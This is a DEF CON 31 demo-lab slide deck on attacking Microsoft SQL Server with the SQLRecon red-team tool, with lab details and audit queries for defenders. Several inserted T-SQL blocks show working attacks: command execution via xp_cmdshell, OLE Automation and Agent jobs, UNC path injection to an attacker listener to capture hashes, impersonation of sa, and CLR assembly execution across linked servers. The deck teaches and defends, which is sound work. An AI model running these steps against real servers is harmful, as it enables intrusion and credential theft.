Abusing Microsoft SQL Server with SQLRecon
Sanjiv Kawa
IBM X-Force Red Adversary Services
Intro
Sanjiv Kawa
Senior Managing Security Consultant, Adversary Services at IBM X-Force Red
- Red Team Operator
- Post-Exploitation Tooling Developer
- github.com/xforcered/SQLRecon
@sanjivkawa
github.com/skahwah
Agenda
Microsoft SQL Server Overview  2 min
SQLRecon Overview              4 min
10 Demos!                      20 min
- Enumeration
- Standard Modules
- Attacking MS SQL Server with Low Privileges
- Abusing MS SQL Impersonation
- Attacking Linked MS SQL Servers
- Attacking MS MECM / SCCM Databases
Defensive Considerations       3 min
Questions                      5 min
Get Involved!
Hack with me
- Download the latest release of SQLRecon (v3.3) from github.com/skahwah/SQLRecon/releases
- Spin up a Windows VM
- Connect to SSID SQLRecon-Lab; don't worry, it's safe
- Connection details will be provided before the demos
Microsoft SQL Server Overview
- Relational database for storing and retrieving data
- Deployed on-premises on Windows Server, or in the cloud (e.g. Azure SQL)
- Used by businesses of all sizes, not just large enterprise networks
- Tightly integrated with Active Directory / Azure Active Directory
Why Attack MS SQL Server?
- Often overlooked
- Often misconfigured
- BUILTIN\Users (i.e. every domain user) can connect to MS SQL Server by default, and once connected can:
  - Execute basic SQL commands
  - Determine their privileges via user mappings and roles
  - Perform UNC path injection (force the SQL Server service account to authenticate to an attacker-controlled share)
  - Piggyback off the server's rights to compromise linked SQL Servers
SQLRecon Overview
What's Currently Available?
A good number of offensive MS SQL Server tools already exist.
How Did This Research Come About?
Like most tooling, to solve a problem encountered on an engagement.
PowerShell is good, but C# fits better with modern tradecraft (in-memory .NET execution from a C2) when evading defensive controls.
SQLRecon addresses the MS SQL Server C# post-exploitation tooling gap:
- Modernize the approach red teamers can take when facing MS SQL Server
- Operational Security
- Execution Guardrails
- SQLRecon works with a diverse set of C2 frameworks
- Fork & Run and In-Process compatible
Command Line Usage
SQLRecon is straightforward to use. There are only three required arguments:
- An authentication type
- The hostname or IP address of a MS SQL Server
- A module
Example: Enumerating databases on a remote MS SQL Server
SQLRecon.exe /Auth:WinToken /Host:SQL01 /Module:databases
Short-form argument names are also accepted, and arguments are case-insensitive:
SQLRecon.exe /a:wintoken /h:172.16.10.101 /m:databases
Authentication Providers
SQLRecon supports 5 different MS SQL Server authentication providers:
Authentication Type   Example
WinToken              SQLRecon.exe /a:WinToken /h:host /m:module
WinDomain             SQLRecon.exe /a:WinDomain /d:domain /u:user /p:pass /h:host /m:module
Local                 SQLRecon.exe /a:Local /u:user /p:pass /h:host /m:module
AzureAD               SQLRecon.exe /a:AzureDomain /d:domain /u:user /p:pass /h:host /m:module
AzureLocal            SQLRecon.exe /a:AzureLocal /u:user /p:pass /h:host /m:module
Module Overview
SQLRecon has 83 different modules which can be used against MS SQL Server in a variety of scenarios. Listed below are the modules that facilitate privilege escalation, lateral movement or command execution.
Modules that cover all three (privilege escalation, lateral movement and command execution):
- xp_cmdshell
- OLE Automation Procedures
- CLR Integration for Custom .NET Assemblies
- Agent Jobs
Modules that cover one of the three:
- Cleartext ADSI Credential Retrieval
- MECM / SCCM User Management
- Cleartext MECM / SCCM Credential Retrieval
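The first three of the "all three" modules are ordinary, documented SQL Server features that happen to spawn a process as a service account. The T-SQL below is an added example, not taken from the slides or from SQLRecon, and shows each path end to end together with the cleanup a red teamer owes the target. It assumes sysadmin on the instance, a running SQL Server Agent service, and a writable C:\temp on the server for the two output files (both are this example's choices, not anything from the deck); the CLR path is the subject of Demo 7.

```sql
-- Added example (not from the deck or SQLRecon). Assumes sysadmin, a running SQL Server
-- Agent service, and a writable C:\temp on the server for the two output files.

-- xp_cmdshell: an advanced option, so it has to be exposed before it can be enabled.
-- Output comes straight back as a result set. Runs as the SQL Server service account
-- for sysadmin callers, or as the xp_cmdshell proxy account for everyone else.
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;           RECONFIGURE;
EXEC master..xp_cmdshell 'whoami /all';
EXEC sp_configure 'xp_cmdshell', 0;           RECONFIGURE;   -- put it back

-- OLE Automation Procedures: WScript.Shell created inside the sqlservr.exe process.
-- Nothing is returned to the caller, so the command's output is redirected to a file.
-- 'show advanced options' is still 1 from the block above.
EXEC sp_configure 'Ole Automation Procedures', 1; RECONFIGURE;
DECLARE @shell INT, @hr INT;
EXEC @hr = sp_OACreate 'WScript.Shell', @shell OUTPUT;
IF @hr <> 0 EXEC sp_OAGetErrorInfo @shell;
-- Run(command, windowStyle = 0 hidden, waitOnReturn = 1)
EXEC @hr = sp_OAMethod @shell, 'Run', NULL, 'cmd.exe /c whoami > C:\temp\ole_whoami.txt', 0, 1;
EXEC sp_OADestroy @shell;
EXEC sp_configure 'Ole Automation Procedures', 0; RECONFIGURE;

-- Agent Jobs: a CmdExec step runs under the SQL Server *Agent* service account, which is
-- often a different (and sometimes more privileged) identity than the engine's.
-- Needs msdb access and a running Agent; there is nothing to flip with sp_configure.
EXEC msdb.dbo.sp_add_job       @job_name = N'sqlrecon_demo_job';
EXEC msdb.dbo.sp_add_jobstep   @job_name = N'sqlrecon_demo_job', @step_name = N'run',
                               @subsystem = N'CmdExec',
                               @command = N'whoami > C:\temp\agent_whoami.txt';
EXEC msdb.dbo.sp_add_jobserver @job_name = N'sqlrecon_demo_job', @server_name = N'(local)';
EXEC msdb.dbo.sp_start_job     @job_name = N'sqlrecon_demo_job';
WAITFOR DELAY '00:00:05';                                        -- let the step finish
EXEC msdb.dbo.sp_delete_job    @job_name = N'sqlrecon_demo_job'; -- removes job and its history
```

Each of the three leaves a different trail: sp_configure changes are written to the default trace and the error log, OLE leaves nothing in SQL Server but a child process of sqlservr.exe, and the Agent job survives in msdb's job history unless it is deleted as above. That is why the deck's Operational Security demo matters as much as the primitives themselves.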
Demo Time
Get Involved!
WiFi
SSID: SQLRecon-Lab
Password: DefconIsCancelled!
Rules
- Don't DoS the lab. We're all here to learn together.
- Don't attack each other. We're all here to learn together.
- You can attack AD and AAD if you want, but I promise you, it's not going to get you anything.
Lab (kawalabs.local)
DC01    172.16.10.100
SQL01   172.16.10.101
SQL02   172.16.10.102
SQL03   172.16.10.104
MECM01  172.16.10.103
ecom01.database.windows.net
Test Connection String
SQLRecon.exe /a:WinDomain /d:kawalabs /u:jsmith /p:Password123 /h:172.16.10.101 /m:whoami
Demo 1 - Evaluating the current user's permissions
Demo 2 - Locating MS SQL Servers in AD via SPNs
Demo 3 - Enumerating an Azure MS SQL Server database
Demo 4 - Unprivileged UNC Path Injection
Demo 5 - Operational Security and Execution Guardrails
Demo 6 - Privilege Escalation: Abusing Impersonation
BUILTIN\Users can impersonate sa!
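What the low-privileged domain user is actually doing in Demos 1, 4 and 6, written out as raw T-SQL so the modules are not a black box. This is an added example, not SQLRecon's code or a slide from the deck; it assumes the lab login kawalabs\jsmith from the test connection string against SQL01, and 172.16.10.50 is a made-up attacker listener address (Responder, ntlmrelayx or similar), not a host from the lab table.

```sql
-- Added example, not SQLRecon's own code or a slide from the deck.
-- Assumes the lab's low-privileged login kawalabs\jsmith against SQL01.
-- 172.16.10.50 is a made-up attacker listener, not a host from the lab table.

-- 1. Who am I, and what do I hold? (Demo 1)
SELECT SYSTEM_USER AS login_name, USER_NAME() AS db_user,
       IS_SRVROLEMEMBER('sysadmin') AS is_sysadmin;

-- Server roles of the current login; for BUILTIN\Users the expected answer is public only.
-- IS_SRVROLEMEMBER() evaluates the caller's full token, so membership inherited through a
-- Windows group shows up here where a join on sys.server_role_members would miss it.
SELECT name AS server_role, IS_SRVROLEMEMBER(name) AS current_login_is_member
FROM sys.server_principals
WHERE type = 'R';

-- Databases the login is actually mapped into.
SELECT name AS database_name
FROM sys.databases
WHERE HAS_DBACCESS(name) = 1;

-- 2. Unprivileged UNC path injection (Demo 4). xp_dirtree is executable by public and
--    runs inside the engine, so the SQL Server *service account* authenticates to the
--    share: its NetNTLM challenge-response lands on the listener, ready to crack or relay.
EXEC master..xp_dirtree '\\172.16.10.50\share', 1, 1;

-- 3. Impersonation (Demo 6). Metadata visibility means a low-privileged login only sees
--    the permission rows that apply to its own token, which is exactly the list we want.
SELECT target.name AS can_impersonate, p.state_desc
FROM sys.server_permissions AS p
JOIN sys.server_principals AS target ON target.principal_id = p.major_id
WHERE p.class_desc = 'SERVER_PRINCIPAL'
  AND p.permission_name = 'IMPERSONATE'
  AND p.state = 'G';

-- If sa is in that list, the rest of the session runs as sa: full sysadmin from a
-- BUILTIN\Users login without touching a credential.
EXECUTE AS LOGIN = 'sa';
SELECT SYSTEM_USER AS now_running_as, IS_SRVROLEMEMBER('sysadmin') AS is_sysadmin;
REVERT;
```

Run it with any T-SQL client as the low-privileged login. Everything before the EXECUTE AS is plain catalog reads, so from the defender's side the first event worth anything is the outbound SMB connection from the SQL Server service account to the listener, followed by the EXECUTE AS LOGIN itself (audited as a login change if server audit is on).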
Demo 7 - Lateral Movement: Abusing Linked MS SQL Servers
SQL02 has an MS SQL Server link to SQL03
- CLR Integration allows custom .NET assemblies to be loaded into MS SQL Server (CREATE ASSEMBLY)
- The assembly is stored inside a database, and a stored procedure is created that maps to one of its methods (CREATE PROCEDURE ... AS EXTERNAL NAME)
- Calling that procedure executes whatever the assembly contains, inside the SQL Server process as its service account!
Basic Template: gist.github.com/skahwah/c92a8ce41f529f40c14715c91b8f90ce
Process Hollowing: gist.github.com/skahwah/a585e176e4a5cf319b0c759637f5c410
// sql.cs
// Compile: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /target:library c:\temp\sql.cs
using System;
using System.Data;
using System.Data.SqlClient;
using System.Data.SqlTypes;
using Microsoft.SqlServer.Server;
using System.Diagnostics;

public partial class StoredProcedures
{
    // Exposed to T-SQL via CREATE PROCEDURE ... AS EXTERNAL NAME <assembly>.StoredProcedures.CustomFunctionName
    [Microsoft.SqlServer.Server.SqlProcedure]
    public static void CustomFunctionName()
    {
        // Runs inside sqlservr.exe, i.e. as the SQL Server service account
        Process proc = new Process();
        proc.StartInfo.FileName = @"C:\Windows\System32\notepad.exe";
        proc.Start();
    }
}
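The T-SQL side of Demo 7, as an added example rather than SQLRecon's own implementation or a slide from the deck: enumerate the link on SQL02, confirm what the link's credential is on SQL03, then register the assembly compiled from sql.cs above and fire it, all through the link. Lab names are the slides' (SQL02 linked to SQL03); the assembly name sqlrecon_demo and the path C:\temp\sql.dll, which must already exist on SQL03 because CREATE ASSEMBLY FROM a path is read by the remote SQL Server service account, are assumptions of this example.

```sql
-- Added example, not SQLRecon's own code. SQL02 -> SQL03 link is from the lab; the
-- assembly name sqlrecon_demo and C:\temp\sql.dll on SQL03 are this example's assumptions.

-- 1. On SQL02: which links exist, and whose credentials do they carry?
--    A fixed remote_name with uses_self_credential = 0 means every local login that can
--    reach this server gets the far side as that remote login.
SELECT s.name, s.data_source, s.is_rpc_out_enabled, ll.uses_self_credential, ll.remote_name
FROM sys.servers AS s
LEFT JOIN sys.linked_logins AS ll ON ll.server_id = s.server_id
WHERE s.is_linked = 1;

-- 2. Execute on the far side. Needs RPC Out enabled on the link. The batch runs as the
--    mapped remote login, not as the caller, which is what makes links a privilege path.
EXEC ('SELECT @@SERVERNAME AS server_name, SYSTEM_USER AS login_name,
              IS_SRVROLEMEMBER(''sysadmin'') AS is_sysadmin;') AT [SQL03];

-- 3. If that login is sysadmin on SQL03, enable CLR there.
EXEC ('EXEC sp_configure ''show advanced options'', 1; RECONFIGURE;
       EXEC sp_configure ''clr enabled'', 1;           RECONFIGURE;') AT [SQL03];

-- 4. Register the assembly. msdb is TRUSTWORTHY by default and owned by sa, which is what
--    lets an UNSAFE assembly load even with "clr strict security" on (SQL Server 2017+).
--    A tool that cannot drop a file uses the byte-literal form instead: FROM 0x4D5A...
EXEC ('USE msdb;
       CREATE ASSEMBLY sqlrecon_demo FROM ''C:\temp\sql.dll'' WITH PERMISSION_SET = UNSAFE;') AT [SQL03];

-- 5. Expose the method as a stored procedure. CREATE PROCEDURE must be alone in its
--    batch, so it goes through sp_executesql, database-qualified to land in msdb.
EXEC ('EXEC msdb.sys.sp_executesql
         N''CREATE PROCEDURE dbo.CustomFunctionName
            AS EXTERNAL NAME sqlrecon_demo.StoredProcedures.CustomFunctionName;'';') AT [SQL03];

-- 6. Run it: per sql.cs, notepad.exe starts on SQL03 as the SQL Server service account.
EXEC ('EXEC msdb.dbo.CustomFunctionName;') AT [SQL03];

-- 7. Clean up both objects on SQL03.
EXEC ('USE msdb; DROP PROCEDURE dbo.CustomFunctionName; DROP ASSEMBLY sqlrecon_demo;') AT [SQL03];
```

Every inner single quote is doubled because each batch travels as a string literal to EXEC ... AT; step 5 doubles them once more for the nested sp_executesql string. The query in step 1 is the same one a defender should run: a link with RPC Out on and a fixed, privileged remote login is exactly the configuration this demo abuses.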
Demo 8 - Credential Abuse: ADSI Double-Link Boomerang
SQL03 has an ADSI link to DC01
Demo 9 - SCCM / MECM Enumeration
Demo 10 - Privilege Escalation: MECM / SCCM
Defensive Considerations
Check out the Wiki for comprehensive Prevention, Detection and Mitigation guidance!
github.com/xforcered/SQLRecon/wiki
Top 3 MS SQL Server Security Controls
- Follow the Microsoft SQL Server security best practices!
- Consider removing or restricting the BUILTIN\Users login, and other low-privilege groups, from authenticating to MS SQL Server instances
- Evaluate impersonation grants and MS SQL Server links
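A concrete version of the three controls, added here as an example rather than text from the slides or the SQLRecon wiki. Run it as sysadmin on each instance; every row returned is a finding to justify or remove. The group names in the first query are the usual offenders, not an exhaustive list, and the assembly query only covers the database it is run in.

```sql
-- Added example (not from the deck or the SQLRecon wiki). Run as sysadmin per instance.

-- 1. Broad Windows groups holding a server login. BUILTIN\Users on a domain-joined
--    host contains Domain Users, so this is "every domain user can connect".
SELECT name, type_desc, is_disabled, create_date
FROM sys.server_principals
WHERE type = 'G'
  AND (name IN (N'BUILTIN\Users', N'NT AUTHORITY\Authenticated Users')
       OR name LIKE N'%\Domain Users');

-- Server roles held by any Windows group login (public is implicit and not listed).
SELECT r.name AS server_role, m.name AS member
FROM sys.server_role_members AS rm
JOIN sys.server_principals  AS r ON r.principal_id = rm.role_principal_id
JOIN sys.server_principals  AS m ON m.principal_id = rm.member_principal_id
WHERE m.type = 'G';

-- 2. Impersonation grants (Demo 6): who may EXECUTE AS which login, and is the target sysadmin?
SELECT grantee.name AS grantee, grantee.type_desc AS grantee_type,
       target.name  AS can_impersonate,
       IS_SRVROLEMEMBER('sysadmin', target.name) AS target_is_sysadmin,
       p.state_desc
FROM sys.server_permissions AS p
JOIN sys.server_principals  AS grantee ON grantee.principal_id = p.grantee_principal_id
JOIN sys.server_principals  AS target  ON target.principal_id  = p.major_id
WHERE p.class_desc = 'SERVER_PRINCIPAL'
  AND p.permission_name = 'IMPERSONATE';

-- 3. Linked servers (Demos 7 and 8): RPC Out plus a fixed remote login means anyone who
--    can reach this server executes on the far side as that login.
SELECT s.name, s.product, s.provider, s.data_source, s.is_rpc_out_enabled,
       ll.uses_self_credential, ll.remote_name,
       lp.name AS local_login      -- NULL here = the mapping applies to all local logins
FROM sys.servers AS s
JOIN sys.linked_logins AS ll ON ll.server_id = s.server_id
LEFT JOIN sys.server_principals AS lp ON lp.principal_id = ll.local_principal_id
WHERE s.is_linked = 1;

-- 4. Command-execution features that should normally be off (1 = enabled).
SELECT name, value_in_use
FROM sys.configurations
WHERE name IN ('xp_cmdshell', 'Ole Automation Procedures', 'clr enabled',
               'clr strict security', 'Agent XPs');

-- 5. User-defined CLR assemblies in the current database (Demo 7), and the databases
--    whose TRUSTWORTHY bit lets an UNSAFE assembly load in the first place.
SELECT DB_NAME() AS database_name, name, permission_set_desc, create_date
FROM sys.assemblies
WHERE is_user_defined = 1;

SELECT name, is_trustworthy_on, SUSER_SNAME(owner_sid) AS owner
FROM sys.databases
WHERE is_trustworthy_on = 1;
```

Scheduling this as a periodic job and diffing the output is a cheap detection on its own: a new IMPERSONATE grant, a new link, a non-Microsoft assembly, or xp_cmdshell flipping to 1 are each a change that someone should be able to explain.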
Questions or Comments?
Thank You
@xforcered
github.com/xforcered/SQLRecon
IBM X-Force Red
github.com/skahwah
@sanjivkawa
DEF CON 31 Demo Labs 2023: Abusing Microsoft SQL Server with SQLRecon

More Related Content

What's hot

How To Handle Cybersecurity Risk PowerPoint Presentation Slides
How To Handle Cybersecurity Risk PowerPoint Presentation SlidesHow To Handle Cybersecurity Risk PowerPoint Presentation Slides
How To Handle Cybersecurity Risk PowerPoint Presentation SlidesSlideTeam
 
VAPT - Vulnerability Assessment & Penetration Testing
VAPT - Vulnerability Assessment & Penetration Testing VAPT - Vulnerability Assessment & Penetration Testing
VAPT - Vulnerability Assessment & Penetration Testing Netpluz Asia Pte Ltd
 
Threat Hunting - Moving from the ad hoc to the formal
Threat Hunting - Moving from the ad hoc to the formalThreat Hunting - Moving from the ad hoc to the formal
Threat Hunting - Moving from the ad hoc to the formalPriyanka Aash
 
Simplificando la seguridad en entornos de nube híbridos con el Security Fabri...
Simplificando la seguridad en entornos de nube híbridos con el Security Fabri...Simplificando la seguridad en entornos de nube híbridos con el Security Fabri...
Simplificando la seguridad en entornos de nube híbridos con el Security Fabri...Cristian Garcia G.
 
How to Spot and Combat a Phishing Attack - Cyber Security Webinar | ControlScan
How to Spot and Combat a Phishing Attack - Cyber Security Webinar | ControlScanHow to Spot and Combat a Phishing Attack - Cyber Security Webinar | ControlScan
How to Spot and Combat a Phishing Attack - Cyber Security Webinar | ControlScanControlScan, Inc.
 
Cyber security
Cyber securityCyber security
Cyber securitymanoj duli
 
The ATT&CK Philharmonic
The ATT&CK PhilharmonicThe ATT&CK Philharmonic
The ATT&CK PhilharmonicMITRE ATT&CK
 
2022 Rea & Associates' Cybersecurity Conference
2022 Rea & Associates' Cybersecurity Conference 2022 Rea & Associates' Cybersecurity Conference
2022 Rea & Associates' Cybersecurity Conference Rea & Associates
 
Board and Cyber Security
Board and Cyber SecurityBoard and Cyber Security
Board and Cyber SecurityLeon Fouche
 
Cyber Security Incident Response Planning
Cyber Security Incident Response PlanningCyber Security Incident Response Planning
Cyber Security Incident Response PlanningPECB
 
BSidesLV 2018 - Katie Nickels and John Wunder - ATT&CKing the Status Quo
BSidesLV 2018 - Katie Nickels and John Wunder - ATT&CKing the Status QuoBSidesLV 2018 - Katie Nickels and John Wunder - ATT&CKing the Status Quo
BSidesLV 2018 - Katie Nickels and John Wunder - ATT&CKing the Status QuoKatie Nickels
 
Cyber Threat Simulation Training
Cyber Threat Simulation TrainingCyber Threat Simulation Training
Cyber Threat Simulation TrainingBryan Len
 
Ciberseguridad Alineada al Negocio
Ciberseguridad Alineada al NegocioCiberseguridad Alineada al Negocio
Ciberseguridad Alineada al NegocioCristian Garcia G.
 
How To Present Cyber Security To Senior Management Complete Deck
How To Present Cyber Security To Senior Management Complete DeckHow To Present Cyber Security To Senior Management Complete Deck
How To Present Cyber Security To Senior Management Complete DeckSlideTeam
 
Would you Rather Have Telemetry into 2 Attacks or 20? An Insight Into Highly ...
Would you Rather Have Telemetry into 2 Attacks or 20? An Insight Into Highly ...Would you Rather Have Telemetry into 2 Attacks or 20? An Insight Into Highly ...
Would you Rather Have Telemetry into 2 Attacks or 20? An Insight Into Highly ...MITRE ATT&CK
 
Reducción efectiva del riesgo de ciberseguridad
Reducción efectiva del riesgo de ciberseguridadReducción efectiva del riesgo de ciberseguridad
Reducción efectiva del riesgo de ciberseguridadCristian Garcia G.
 
Tracking Noisy Behavior and Risk-Based Alerting with ATT&CK
Tracking Noisy Behavior and Risk-Based Alerting with ATT&CKTracking Noisy Behavior and Risk-Based Alerting with ATT&CK
Tracking Noisy Behavior and Risk-Based Alerting with ATT&CKMITRE ATT&CK
 
Cybersecurity Attack Vectors: How to Protect Your Organization
Cybersecurity Attack Vectors: How to Protect Your OrganizationCybersecurity Attack Vectors: How to Protect Your Organization
Cybersecurity Attack Vectors: How to Protect Your OrganizationTriCorps Technologies
 

What's hot (20)

How To Handle Cybersecurity Risk PowerPoint Presentation Slides
How To Handle Cybersecurity Risk PowerPoint Presentation SlidesHow To Handle Cybersecurity Risk PowerPoint Presentation Slides
How To Handle Cybersecurity Risk PowerPoint Presentation Slides
 
VAPT - Vulnerability Assessment & Penetration Testing
VAPT - Vulnerability Assessment & Penetration Testing VAPT - Vulnerability Assessment & Penetration Testing
VAPT - Vulnerability Assessment & Penetration Testing
 
Threat Hunting - Moving from the ad hoc to the formal
Threat Hunting - Moving from the ad hoc to the formalThreat Hunting - Moving from the ad hoc to the formal
Threat Hunting - Moving from the ad hoc to the formal
 
Cybersecurity
CybersecurityCybersecurity
Cybersecurity
 
Simplificando la seguridad en entornos de nube híbridos con el Security Fabri...
Simplificando la seguridad en entornos de nube híbridos con el Security Fabri...Simplificando la seguridad en entornos de nube híbridos con el Security Fabri...
Simplificando la seguridad en entornos de nube híbridos con el Security Fabri...
 
How to Spot and Combat a Phishing Attack - Cyber Security Webinar | ControlScan
How to Spot and Combat a Phishing Attack - Cyber Security Webinar | ControlScanHow to Spot and Combat a Phishing Attack - Cyber Security Webinar | ControlScan
How to Spot and Combat a Phishing Attack - Cyber Security Webinar | ControlScan
 
Cyber security
Cyber securityCyber security
Cyber security
 
The ATT&CK Philharmonic
The ATT&CK PhilharmonicThe ATT&CK Philharmonic
The ATT&CK Philharmonic
 
2022 Rea & Associates' Cybersecurity Conference
2022 Rea & Associates' Cybersecurity Conference 2022 Rea & Associates' Cybersecurity Conference
2022 Rea & Associates' Cybersecurity Conference
 
Board and Cyber Security
Board and Cyber SecurityBoard and Cyber Security
Board and Cyber Security
 
Cyber Security Incident Response Planning
Cyber Security Incident Response PlanningCyber Security Incident Response Planning
Cyber Security Incident Response Planning
 
BSidesLV 2018 - Katie Nickels and John Wunder - ATT&CKing the Status Quo
BSidesLV 2018 - Katie Nickels and John Wunder - ATT&CKing the Status QuoBSidesLV 2018 - Katie Nickels and John Wunder - ATT&CKing the Status Quo
BSidesLV 2018 - Katie Nickels and John Wunder - ATT&CKing the Status Quo
 
Cyber Threat Simulation Training
Cyber Threat Simulation TrainingCyber Threat Simulation Training
Cyber Threat Simulation Training
 
Ciberseguridad Alineada al Negocio
Ciberseguridad Alineada al NegocioCiberseguridad Alineada al Negocio
Ciberseguridad Alineada al Negocio
 
How To Present Cyber Security To Senior Management Complete Deck
How To Present Cyber Security To Senior Management Complete DeckHow To Present Cyber Security To Senior Management Complete Deck
How To Present Cyber Security To Senior Management Complete Deck
 
Would you Rather Have Telemetry into 2 Attacks or 20? An Insight Into Highly ...
Would you Rather Have Telemetry into 2 Attacks or 20? An Insight Into Highly ...Would you Rather Have Telemetry into 2 Attacks or 20? An Insight Into Highly ...
Would you Rather Have Telemetry into 2 Attacks or 20? An Insight Into Highly ...
 
Reducción efectiva del riesgo de ciberseguridad
Reducción efectiva del riesgo de ciberseguridadReducción efectiva del riesgo de ciberseguridad
Reducción efectiva del riesgo de ciberseguridad
 
Tracking Noisy Behavior and Risk-Based Alerting with ATT&CK
Tracking Noisy Behavior and Risk-Based Alerting with ATT&CKTracking Noisy Behavior and Risk-Based Alerting with ATT&CK
Tracking Noisy Behavior and Risk-Based Alerting with ATT&CK
 
Cybersecurity Attack Vectors: How to Protect Your Organization
Cybersecurity Attack Vectors: How to Protect Your OrganizationCybersecurity Attack Vectors: How to Protect Your Organization
Cybersecurity Attack Vectors: How to Protect Your Organization
 
Using the Threat Agent Library to improve threat modeling
Using the Threat Agent Library to improve threat modelingUsing the Threat Agent Library to improve threat modeling
Using the Threat Agent Library to improve threat modeling
 

Similar to DEF CON 31 Demo Labs 2023: Abusing Microsoft SQL Server with SQLRecon

2019 Blackhat Booth Presentation - PowerUpSQL
2019 Blackhat Booth Presentation - PowerUpSQL2019 Blackhat Booth Presentation - PowerUpSQL
2019 Blackhat Booth Presentation - PowerUpSQLScott Sutherland
 
Database Mirror for the exceptional DBA – David Izahk
Database Mirror for the exceptional DBA – David IzahkDatabase Mirror for the exceptional DBA – David Izahk
Database Mirror for the exceptional DBA – David Izahksqlserver.co.il
 
SQL Server Security - Attack
SQL Server Security - Attack SQL Server Security - Attack
SQL Server Security - Attack webhostingguy
 
SDC - Programming the CLR in SQL Server 2005.ppt (1.51 MB)
SDC - Programming the CLR in SQL Server 2005.ppt (1.51 MB)SDC - Programming the CLR in SQL Server 2005.ppt (1.51 MB)
SDC - Programming the CLR in SQL Server 2005.ppt (1.51 MB)webhostingguy
 
TROOPERS 20 - SQL Server Hacking Tips for Active Directory Environments
TROOPERS 20 - SQL Server Hacking Tips for Active Directory EnvironmentsTROOPERS 20 - SQL Server Hacking Tips for Active Directory Environments
TROOPERS 20 - SQL Server Hacking Tips for Active Directory EnvironmentsScott Sutherland
 
Abusing MS SQL Using SQLRecon
Abusing MS SQL Using SQLReconAbusing MS SQL Using SQLRecon
Abusing MS SQL Using SQLReconSanjiv Kawa
 
61883659_WinCC_RuntimeAdv_access_SQL_via_script_DOCU_en (1).pdf
61883659_WinCC_RuntimeAdv_access_SQL_via_script_DOCU_en (1).pdf61883659_WinCC_RuntimeAdv_access_SQL_via_script_DOCU_en (1).pdf
61883659_WinCC_RuntimeAdv_access_SQL_via_script_DOCU_en (1).pdfmohamedhayballa1
 
PowerUpSQL - 2018 Blackhat USA Arsenal Presentation
PowerUpSQL - 2018 Blackhat USA Arsenal PresentationPowerUpSQL - 2018 Blackhat USA Arsenal Presentation
PowerUpSQL - 2018 Blackhat USA Arsenal PresentationScott Sutherland
 
SQL Server Exploitation, Escalation, Pilfering - AppSec USA 2012
SQL Server Exploitation, Escalation, Pilfering - AppSec USA 2012SQL Server Exploitation, Escalation, Pilfering - AppSec USA 2012
SQL Server Exploitation, Escalation, Pilfering - AppSec USA 2012Scott Sutherland
 
MySQL Day Roma - MySQL Shell and Visual Studio Code Extension
MySQL Day Roma - MySQL Shell and Visual Studio Code ExtensionMySQL Day Roma - MySQL Shell and Visual Studio Code Extension
MySQL Day Roma - MySQL Shell and Visual Studio Code ExtensionFrederic Descamps
 
Ultimate Free SQL Server Toolkit
Ultimate Free SQL Server ToolkitUltimate Free SQL Server Toolkit
Ultimate Free SQL Server ToolkitKevin Kline
 
Enter the Dragon - SQL 2014 on Server Core PASS Summit 2014 Edition
Enter the Dragon -  SQL 2014 on Server Core PASS Summit 2014 EditionEnter the Dragon -  SQL 2014 on Server Core PASS Summit 2014 Edition
Enter the Dragon - SQL 2014 on Server Core PASS Summit 2014 EditionMark Broadbent
 
2016 aRcTicCON - Hacking SQL Server on Scale with PowerShell (Slide Updates)
2016 aRcTicCON - Hacking SQL Server on Scale with PowerShell (Slide Updates)2016 aRcTicCON - Hacking SQL Server on Scale with PowerShell (Slide Updates)
2016 aRcTicCON - Hacking SQL Server on Scale with PowerShell (Slide Updates)Scott Sutherland
 
DevOps and the Future of Enterprise Security
DevOps and the Future of Enterprise SecurityDevOps and the Future of Enterprise Security
DevOps and the Future of Enterprise SecurityFrank Kim
 
SQLSaturday#290_Kiev_WindowsAzureDatabaseForBeginners
SQLSaturday#290_Kiev_WindowsAzureDatabaseForBeginnersSQLSaturday#290_Kiev_WindowsAzureDatabaseForBeginners
SQLSaturday#290_Kiev_WindowsAzureDatabaseForBeginnersTobias Koprowski
 
The Emergence of Choice in the .NET Ecosystem
The Emergence of Choice in the .NET EcosystemThe Emergence of Choice in the .NET Ecosystem
The Emergence of Choice in the .NET EcosystemJames Avery
 
Understanding and preventing sql injection attacks
Understanding and preventing sql injection attacksUnderstanding and preventing sql injection attacks
Understanding and preventing sql injection attacksKevin Kline
 

Similar to DEF CON 31 Demo Labs 2023: Abusing Microsoft SQL Server with SQLRecon (20)

SQL Injection
SQL InjectionSQL Injection
SQL Injection
 
2019 Blackhat Booth Presentation - PowerUpSQL
2019 Blackhat Booth Presentation - PowerUpSQL2019 Blackhat Booth Presentation - PowerUpSQL
2019 Blackhat Booth Presentation - PowerUpSQL
 
Database Mirror for the exceptional DBA – David Izahk
Database Mirror for the exceptional DBA – David IzahkDatabase Mirror for the exceptional DBA – David Izahk
Database Mirror for the exceptional DBA – David Izahk
 
SQL Server Security - Attack
SQL Server Security - Attack SQL Server Security - Attack
SQL Server Security - Attack
 
SDC - Programming the CLR in SQL Server 2005.ppt (1.51 MB)
SDC - Programming the CLR in SQL Server 2005.ppt (1.51 MB)SDC - Programming the CLR in SQL Server 2005.ppt (1.51 MB)
SDC - Programming the CLR in SQL Server 2005.ppt (1.51 MB)
 
TROOPERS 20 - SQL Server Hacking Tips for Active Directory Environments
TROOPERS 20 - SQL Server Hacking Tips for Active Directory EnvironmentsTROOPERS 20 - SQL Server Hacking Tips for Active Directory Environments
TROOPERS 20 - SQL Server Hacking Tips for Active Directory Environments
 
Abusing MS SQL Using SQLRecon
Abusing MS SQL Using SQLReconAbusing MS SQL Using SQLRecon
Abusing MS SQL Using SQLRecon
 
Sql Sever Presentation.pptx
Sql Sever Presentation.pptxSql Sever Presentation.pptx
Sql Sever Presentation.pptx
 
61883659_WinCC_RuntimeAdv_access_SQL_via_script_DOCU_en (1).pdf
61883659_WinCC_RuntimeAdv_access_SQL_via_script_DOCU_en (1).pdf61883659_WinCC_RuntimeAdv_access_SQL_via_script_DOCU_en (1).pdf
61883659_WinCC_RuntimeAdv_access_SQL_via_script_DOCU_en (1).pdf
 
PowerUpSQL - 2018 Blackhat USA Arsenal Presentation
PowerUpSQL - 2018 Blackhat USA Arsenal PresentationPowerUpSQL - 2018 Blackhat USA Arsenal Presentation
PowerUpSQL - 2018 Blackhat USA Arsenal Presentation
 
SQL Server Exploitation, Escalation, Pilfering - AppSec USA 2012
SQL Server Exploitation, Escalation, Pilfering - AppSec USA 2012SQL Server Exploitation, Escalation, Pilfering - AppSec USA 2012
SQL Server Exploitation, Escalation, Pilfering - AppSec USA 2012
 
